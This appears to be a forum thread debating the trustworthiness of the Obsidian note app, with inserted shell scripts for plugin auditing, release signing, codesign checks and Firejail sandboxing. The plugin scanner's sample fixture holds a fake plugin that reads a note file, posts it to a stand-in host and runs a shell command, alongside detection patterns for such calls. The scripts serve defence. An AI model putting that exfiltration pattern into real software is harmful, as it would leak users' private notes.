There are many good reasons to trust the Obsidian team (they are not VC backed, they clearly state they don’t own your data, you are not locked in). If you don’t trust them because they are not open-source and want to be a purist about it, then just use an open-source markdown editor instead.
Community plugins, and the way they're approved once and not reviewed over time due to limited resources, are the main problem.
There are many facets to that. Plugins have unrestricted access: they can start servers, make HTTP calls, read/write files ...
Plugins get approved once, but are never checked again.
And plugins are now increasing in number more rapidly, ...
Is this a Mac thing?
On Windows this is how most applications are distributed.
Same with Spotify etc.
Also even if it is open source, who really verifies the binary is built from the source published?
You should always be careful with closed source software. You should also be careful with open source software, unless you're building from source and manually checking that the source in each update isn't malicious, which, let's be real, nobody does.
I had to do some gap analysis between note-taking apps with a graph view functionality to allow me to visualise my knowledge-base.
Obsidian was my initial choice but I had grievances with it. I ended up going with Logseq for many reasons - yes, it appears to be less mature; however, that doesn't mean it is inferior by any measure (and it is open-source).
Don’t really see much of a reason to single out obsidian in this
I wouldn’t hold not being on the Mac App Store against it. The MAS is sort of a failed ecosystem with very low usage/engagement, and all the downsides of the iOS store like potentially lengthy review times (can be a lot longer than the iOS store since it seems to play second fiddle) and arbitrary capricious rejections when you’re just trying to ship innocuous bug fixes to users.
I think the increasingly widespread attitude that only open source software is good and trustworthy is increasingly annoying and problematic.
Building software takes time and resources. Experience shows that most open source projects do not make enough money to make the resource investment worthwhile, much less the time investment.
I generally like people being able to put food on the table, and if that means I have to pay for their software to use it or get updates, then I am happy to do so if that software is of value to me.
That of course doesn’t mean I appreciate unnecessary vendor lock-in, hostile subscription models, etc. All of these things are common with proprietary software, but they are not inherent to it.
Obsidian is a great example. Easy to take out, open formats, a generous licensing model and no aggressive licensing implementation that makes it impossible to use the software offline. The team behind it seems to be able to make a living and people can still feel safe about the access to their notes.
Even if it's not open source, it would be great progress if we had more software like Obsidian.
Not being able to give granular permissions to folders is not the problem of an app which, regardless of being open or closed source, may be compromised. Remember that the risk is zero if and only if you avoid the risk, i.e. in this particular case do not install Obsidian.
macOS:
- does not have a granular permissions model as far as I know;
- deprecated sandbox-exec, which allowed one to achieve the above;
- the macOS App Store is a very strange phenomenon, I would not put much trust in it by default.
Obsidian:
- has a system of community plugins and themes which is dangerous and has been discussed multiple times[0]. But the problem of managing community plugins is not unique to them. Malicious npm packages, go modules and rust crates (and you name it) anyone?.. you are on your own here mostly. And you need to perform your own due diligence of those community supported random bits.
Obsidian could hugely benefit from an independent audit of the closed source base. That would help build trust in the core of their product.
[0]: https://www.emilebangma.com/Writings/Blog/An-open-letter-to-...
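The "perform your own due diligence" point above is easier to act on with a script than by opening every plugin by hand. The following is an added example, not Obsidian's own tooling and not anything the commenter posted: it walks a vault's installed community plugins (Obsidian keeps each one at `<vault>/.obsidian/plugins/<id>/` as `manifest.json` plus a bundled `main.js`, and lists enabled ids in `.obsidian/community-plugins.json`) and reports which ones reach for the network, a shell, the filesystem or `eval`. The capability patterns are this example's own heuristic, and the two sample plugins it scans are constructed fixtures, not real plugins from the directory.

```shell
#!/bin/sh
# Added example, not Obsidian's own tooling: a first-pass audit of the community
# plugins installed in a vault. Each plugin lives at
# <vault>/.obsidian/plugins/<id>/ as manifest.json + main.js and runs with full
# Electron/Node access, so the only question this answers is "which plugins
# reach for the network, a shell or the filesystem?", i.e. which code to read first.
# The patterns below are this example's own heuristic, not a vulnerability list.

CAPS='
net:require\(.(http|https).\)|fetch\(|requestUrl\(|XMLHttpRequest|WebSocket
server:createServer\(|\.listen\(
exec:child_process|execSync\(|spawn\(
fs:require\(.fs.\)|readFileSync\(|writeFileSync\(|\.adapter\.(read|write)\(
eval:eval\(|new[[:space:]]+Function\('

# json_field FILE KEY : crude string extractor, enough for a manifest.json
json_field() {
    sed -n "s/.*\"$2\"[[:space:]]*:[[:space:]]*\"\([^\"]*\)\".*/\1/p" "$1" 2>/dev/null | head -n 1
}

# scan_plugin DIR : print "<id> <version> <caps>" (caps comma-joined, or "none")
scan_plugin() {
    dir=$1; main="$dir/main.js"
    [ -f "$main" ] || return 1
    id=$(json_field "$dir/manifest.json" id)
    version=$(json_field "$dir/manifest.json" version)
    found=""
    set -f                       # no globbing while $CAPS is split into words
    for entry in $CAPS; do
        label=${entry%%:*}; regex=${entry#*:}
        if grep -Eq "$regex" "$main"; then found="${found:+$found,}$label"; fi
    done
    set +f
    printf '%s %s %s\n' "${id:-$(basename "$dir")}" "${version:-?}" "${found:-none}"
}

# scan_vault VAULT : one line per installed plugin; '*' marks plugins that are enabled
scan_vault() {
    vault=$1
    enabled=$(cat "$vault/.obsidian/community-plugins.json" 2>/dev/null || true)
    for d in "$vault"/.obsidian/plugins/*/; do
        [ -d "$d" ] || continue
        d=${d%/}
        line=$(scan_plugin "$d") || continue
        pid=${line%% *}
        case "$enabled" in *"\"$pid\""*) mark='*' ;; *) mark=' ' ;; esac
        printf '%s %s\n' "$mark" "$line"
    done
}

# make_sample_vault : constructed fixture (two made-up plugins) so this runs offline
make_sample_vault() {
    v=$(mktemp -d)
    mkdir -p "$v/.obsidian/plugins/quiet-notes" "$v/.obsidian/plugins/sync-helper"
    printf '["sync-helper"]\n' > "$v/.obsidian/community-plugins.json"
    printf '{ "id": "quiet-notes", "name": "Quiet Notes", "version": "1.0.2" }\n' \
        > "$v/.obsidian/plugins/quiet-notes/manifest.json"
    cat > "$v/.obsidian/plugins/quiet-notes/main.js" <<'EOF'
const { Plugin } = require('obsidian');
module.exports = class extends Plugin {
  onload() { this.addCommand({ id: 'hello', name: 'Hello', callback: () => {} }); }
};
EOF
    printf '{ "id": "sync-helper", "name": "Sync Helper", "version": "0.3.0" }\n' \
        > "$v/.obsidian/plugins/sync-helper/manifest.json"
    cat > "$v/.obsidian/plugins/sync-helper/main.js" <<'EOF'
const { Plugin } = require('obsidian');
const fs = require('fs');
const cp = require('child_process');
module.exports = class extends Plugin {
  async onload() {
    const notes = fs.readFileSync(this.app.vault.adapter.basePath + '/Daily.md', 'utf8');
    await fetch('https://example.invalid/collect', { method: 'POST', body: notes });
    cp.execSync('uname -a');
  }
};
EOF
    printf '%s\n' "$v"
}

# Stand-alone run on the constructed vault; pass a real vault path to scan_vault instead.
SAMPLE=$(make_sample_vault)
scan_vault "$SAMPLE"
rm -rf "$SAMPLE"
```

The constructed run prints `  quiet-notes 1.0.2 none` and `* sync-helper 0.3.0 net,exec,fs`. `requestUrl` is Obsidian's own HTTP helper; it shows up next to `fetch` and Node's `http` precisely because nothing stops a plugin from using any of them. A "none" line is triage, not a clean bill of health: minified or dynamically assembled code evades string matching. Since a plugin is reviewed once at approval, the useful habit is to re-run this after every plugin update and read whatever changed.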
Obsidian is a startup that's been on my radar. It inspires me. They're able to go so far as to challenge Notion with their small team, which I appreciate. By the way, I'm not saying Notion is bad. I think it's revitalizing the industry.
On the other hand, I was unaware of the vulnerabilities in the Apple ecosystem. Or rather, I didn't think there would be. The article raised my awareness.
Plugin sandboxing is the answer to such community extension concerns, but then that's unfortunately only part of the bright future ahead...
I've used dozens of notetaking tools over the years. Some cloud-based, some markdown-based, some flashy apps, some plain-text, some open-source, and some closed-source. My takeaway from years of jumping between them is this: don't use closed-source notetaking software. Just don't do it. Even if your data is in markdown files, on your own computer, you're still probably stuck with proprietary markdown extensions, and at the very least, you're stuck with muscle memory for the app's UI that you'd have to translate to some new system eventually. Startup companies come and go, on a monthly basis. Developers move on to shiny new projects. You can't take that risk, or any other security risks, with your personal notes.
Somebody read that recent open letter to the Obsidian Team and realized the security implications rather than just the inconvenience :D
So far I have uninstalled all themes & plugins except the kanban board - I'm working on it. I'll use core obsidian and that's all.
I've known kepano (their CEO) for almost 20 years, he is an incredible builder and a solid human. My hunch is they would never act in an unsavory way to their users. I get the point that it could be more open (a community build would be slick), and yet it's an incredible product and worthy of financial support. I am glad to be a user and love that it's a part of my daily workflow.
The set of open source code and verifiable code overlap, but one doesn't always imply the other. In either case, provenance needs to be established. I think it would be reasonable for Obsidian to ship signed checksums and a public transparency log (e.g., Sigstore) for builds (plugin authors could do the same?). A more granular plugin permissions system would be great too, even though most plugins are OSS.
Would it be best to be closed source and pay to get the source code with 1 year of updates (except, say, the license server unless you're enterprise)?
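What "signed checksums for builds" buys a downloader is concrete enough to show. The block below is an added example, not Obsidian's release process and not the commenter's code: it writes a `SHA256SUMS` manifest over the release artifacts, signs the manifest (one signature covers the release, and each artifact is bound to it by its hash), and then verifies in the order that matters, signature first, hashes second. It uses OpenSSL with a local RSA key that it generates itself so it runs offline; with Sigstore the signature would come from `cosign sign-blob` / `cosign verify-blob` and the verifier would additionally require the transparency-log entry, but the file layout and the two-step check are the same. The artifacts are constructed bytes, not Obsidian builds.

```shell
#!/bin/sh
# Added example, not Obsidian's release process: the checksum-plus-signature
# half of a signed-release scheme, done with OpenSSL and a local RSA key so it
# runs offline. Sigstore would replace the key with a short-lived certificate
# tied to an OIDC identity plus a Rekor log entry; the shape below is unchanged.

# sha256 tool: GNU coreutils on Linux, Perl shasum on macOS
if command -v sha256sum >/dev/null 2>&1; then SHA=sha256sum; else SHA='shasum -a 256'; fi

# make_release_key DIR : generate the (example-only, assumed) signing keypair
make_release_key() {
    openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 -out "$1/release.key" 2>/dev/null
    openssl pkey -in "$1/release.key" -pubout -out "$1/release.pub" 2>/dev/null
}

# release_sign DIR PRIVKEY ARTIFACT... : write DIR/SHA256SUMS over the artifacts,
# then sign the manifest, not the artifacts. One signature covers the release.
release_sign() {
    dir=$1; key=$2; shift 2
    ( cd "$dir" && $SHA "$@" > SHA256SUMS ) || return 1
    openssl dgst -sha256 -sign "$key" -out "$dir/SHA256SUMS.sig" "$dir/SHA256SUMS"
}

# release_verify DIR PUBKEY : 0 if the manifest signature is valid AND every
# listed artifact still hashes to its entry; 1 = bad signature, 2 = bad artifact.
# Check the signature before trusting a single hash in the manifest.
release_verify() {
    dir=$1; pub=$2
    if ! openssl dgst -sha256 -verify "$pub" -signature "$dir/SHA256SUMS.sig" \
            "$dir/SHA256SUMS" >/dev/null 2>&1; then
        echo "manifest signature invalid (wrong key or edited SHA256SUMS)"; return 1
    fi
    if ! ( cd "$dir" && $SHA -c SHA256SUMS ) >/dev/null 2>&1; then
        echo "an artifact does not match the signed manifest"; return 2
    fi
    echo "release verified: signature and all checksums OK"
}

# Stand-alone run with constructed artifacts (not real Obsidian builds).
demo_release() {
    w=$(mktemp -d)
    make_release_key "$w"
    mkdir "$w/rel"
    printf 'constructed dmg bytes\n' > "$w/rel/Obsidian-demo.dmg"
    printf 'constructed deb bytes\n' > "$w/rel/obsidian_demo_amd64.deb"
    release_sign "$w/rel" "$w/release.key" Obsidian-demo.dmg obsidian_demo_amd64.deb
    release_verify "$w/rel" "$w/release.pub"              # verified
    printf 'x' >> "$w/rel/Obsidian-demo.dmg"               # tamper with an artifact
    release_verify "$w/rel" "$w/release.pub" || true       # checksum failure
    printf '# edited\n' >> "$w/rel/SHA256SUMS"             # tamper with the manifest
    release_verify "$w/rel" "$w/release.pub" || true       # signature failure
    rm -rf "$w"
}
demo_release
```

The part a key file cannot give you is the "public transparency log" half of the proposal: with a local key, a verifier only learns that whoever holds `release.key` signed this manifest. Sigstore's `verify-blob` is told which signer identity and which OIDC issuer to accept and checks that the signature was logged, which is what lets a third party notice a build signed by someone other than the project.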
That way the author can still keep the source closed and those who want code can pay for it.
I very rarely see OSS being monetized successfully without a community fork destroying the original project.
OSS still requires money to maintain the project and sparse donations really don't cut it.
This is ridiculous. The macOS app is signed.
codesign -dv /Applications/Obsidian.app
Executable=/Applications/Obsidian.app/Contents/MacOS/Obsidian
Identifier=md.obsidian
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=759 flags=0x10000(runtime) hashes=13+7 location=embedded
Signature size=8975
Timestamp=Sep 29, 2025 at 12:22:41 PM
Info.plist entries=39
TeamIdentifier=6JSW4SJWN9
Runtime Version=15.4.0
Sealed Resources version=2 rules=13 files=23
Internal requirements count=1 size=172
Also, I love OSS as much as the next person, but not everything needs to be.
The scary thing is that nowadays everything is backdoored. And developers/product owners may not even know about it. Obsidian is an Electron app, thus uses npm, and with npm we now get like at least one malicious package per month. If they have package auto-update it's just a matter of time and effort for an attacker to plant something shady there. This could be a simple crypto-stealer, or this could be a way to access people's personal vaults.
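A caveat on the `codesign -dv` output posted above: `-d` displays whatever signature is attached, it does not validate it. The block below is an added example, not from the commenter or from Obsidian. On macOS it runs the real checks (`codesign --verify --deep --strict` for the seal and certificate chain, `spctl --assess` for Gatekeeper's verdict, which includes notarization); on any platform it parses `-dv` output and pins the `TeamIdentifier` and the hardened-runtime flag, so a future update signed by a different Apple developer account is noticed rather than waved through because "it's signed". The sample input is the output posted in the thread; the `APP` path and the pinned team id are the thread's values, treated as assumptions.

```shell
#!/bin/sh
# Added example, not from the thread's commenter or from Obsidian. `codesign -dv`
# only displays the attached signature; it validates nothing. verify_app does the
# validation on macOS, and check_team_id pins the TeamIdentifier (the stable
# per-developer-account value) plus the hardened runtime flag from -dv output.

APP=${APP:-/Applications/Obsidian.app}
EXPECTED_TEAM=6JSW4SJWN9   # TeamIdentifier shown in the thread; pin what you first observed

# check_team_id EXPECTED < codesign-dv-output : 0 if TeamIdentifier matches and
# the hardened runtime flag is set, 1 otherwise (says which check failed).
check_team_id() {
    expected=$1
    out=$(cat)
    team=$(printf '%s\n' "$out" | sed -n 's/^TeamIdentifier=//p' | head -n 1)
    flags=$(printf '%s\n' "$out" | sed -n 's/^CodeDirectory .*flags=\([^ ]*\).*/\1/p' | head -n 1)
    if [ "$team" != "$expected" ]; then
        echo "TeamIdentifier mismatch: got '${team:-none}', expected '$expected'"; return 1
    fi
    case "$flags" in
        *runtime*) ;;
        *) echo "hardened runtime not enabled (flags=${flags:-none})"; return 1 ;;
    esac
    echo "TeamIdentifier $team OK, flags $flags"
}

# verify_app APP EXPECTED : the actual validation (macOS only; 3 = skipped).
# --verify checks the seal over every resource and the signing certificate
# chain, --strict applies current policy, and spctl asks Gatekeeper whether it
# would let the app run, which is where notarization is checked.
verify_app() {
    app=$1; expected=$2
    [ "$(uname)" = Darwin ] || { echo "skipped: codesign/spctl only exist on macOS"; return 3; }
    codesign --verify --deep --strict --verbose=2 "$app" || { echo "signature invalid"; return 1; }
    spctl --assess --type execute --verbose=4 "$app"  || { echo "Gatekeeper rejects $app"; return 1; }
    codesign -dv "$app" 2>&1 | check_team_id "$expected"
}

# The `codesign -dv` output posted in the thread, used as input when not on macOS.
SAMPLE_DV='Executable=/Applications/Obsidian.app/Contents/MacOS/Obsidian
Identifier=md.obsidian
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=759 flags=0x10000(runtime) hashes=13+7 location=embedded
Signature size=8975
TeamIdentifier=6JSW4SJWN9
Runtime Version=15.4.0'

# Stand-alone run: real checks when the app is present on macOS, else the sample.
if [ "$(uname)" = Darwin ] && [ -d "$APP" ]; then
    verify_app "$APP" "$EXPECTED_TEAM"
else
    printf '%s\n' "$SAMPLE_DV" | check_team_id "$EXPECTED_TEAM"
fi
```

Pinning the team id is the part that survives an update: a valid Developer ID signature only proves that some Apple developer account signed the bundle, and `codesign --verify` will pass for any of them. Note that `codesign -dv` writes to stderr, hence the `2>&1` before the parse.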
> Obsidian’s source code is closed
When I toggle developer mode (Command + Option + i on my mac) I see what appears to be the source code (it’s an Electron app). Maybe it’s not the full source though. And I guess it’s very difficult to read since it’s minified.
It's a strange article. Yes, it's not open source, but based on what is the author suspicious? Any bad behaviours from the authors? Change of ownership? Plugin risks?
For me this is the least problematic non-open source software:
- non VC funded (like Mattermost's enshittification after VC)
- open source formats
- community plugins with source code (it's JS)
I know this may go against the ethos of some folks on HN, but I switched to Apple Notes and haven't looked back. At the end of the day, you either use the tool or the tool uses you.
For diagrams, mindmaps, etc... I just use Freeform now -- screen capture or export the board as PDF to paste into my notes. It's deceptively flexible and more powerful than it would appear.
I really like the obsidian canvas.
It is astonishingly sharp
need obsidian open source alternative
But the files Obsidian works with are just a bunch of .md files that can be viewed or edited with anything: nano, notepad, Visual Studio Code, etc. So does it really matter whether it is open source or not?
If you're a Linux user you might like Firejail for this.
--private=~/path/to/jail limits access to your home directory to ~/path/to/jail and when you don't want Obsidian to have internet access you can take it away with --net=none.
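A launcher that puts the two flags above into something you would actually type every day, as an added example (not Obsidian's or Firejail's own code). It assumes Obsidian is on `PATH` as `obsidian` and that `OBSIDIAN_JAIL` (default `$HOME/obsidian-jail`) holds the vault: with `--private=DIR` that directory becomes HOME inside the sandbox, so Obsidian's own config under `~/.config/obsidian` is created inside it too, and a different jail directory is a fully separate home. The script resolves the path itself rather than relying on `--private=~/...`, because sh and bash do not tilde-expand after `=` in an ordinary argument. The extra switches are Firejail's standard hardening options and cost nothing for a note-taking app.

```shell
#!/bin/sh
# Added example, not Obsidian's or Firejail's own code: a launcher around
# --private=DIR and --net=none plus Firejail's usual hardening switches.
# Assumed: `obsidian` is on PATH; JAIL is the directory that becomes HOME inside
# the sandbox (keep the vault there; ~/.config/obsidian lands inside it too).

JAIL=${OBSIDIAN_JAIL:-$HOME/obsidian-jail}

# jail_args MODE JAIL : print the firejail options, one per line.
# offline = no network interface at all; online = network allowed (plugin
# updates, Sync). The rest is hardening that does not affect a notes app.
jail_args() {
    mode=$1; jail=$2
    printf '%s\n' "--private=$jail" --noroot --caps.drop=all --nonewprivs --seccomp \
        --private-dev --private-tmp
    case "$mode" in
        offline) printf '%s\n' --net=none ;;
        online)  ;;
        *) echo "unknown mode: $mode (use offline|online)" >&2; return 1 ;;
    esac
}

# run_obsidian MODE : create the jail directory if needed and exec Obsidian in it.
# A different JAIL is a different home, so use one per vault you want isolated.
run_obsidian() {
    mode=${1:-offline}
    command -v firejail >/dev/null 2>&1 || { echo "firejail is not installed" >&2; return 2; }
    mkdir -p "$JAIL" || return 1
    args=$(jail_args "$mode" "$JAIL") || return 1
    # split on newlines only (and no globbing), so a jail path with spaces stays one argument
    old_ifs=$IFS; IFS='
'; set -f; set -- $args; set +f; IFS=$old_ifs
    exec firejail "$@" obsidian
}

# Stand-alone: print the launch line; call run_obsidian offline|online to launch.
echo "firejail $(jail_args "${OBSIDIAN_MODE:-offline}" "$JAIL" | tr '\n' ' ')obsidian"
```

Switching between `run_obsidian offline` and `run_obsidian online` is the "take the network away when you don't need it" workflow from the comment; `--net=none` removes the interface rather than filtering it, so a plugin that phones home simply cannot. Because the jail is the sandbox's HOME, anything outside it (SSH keys, browser profiles, other vaults) is invisible to Obsidian and to every plugin it loads.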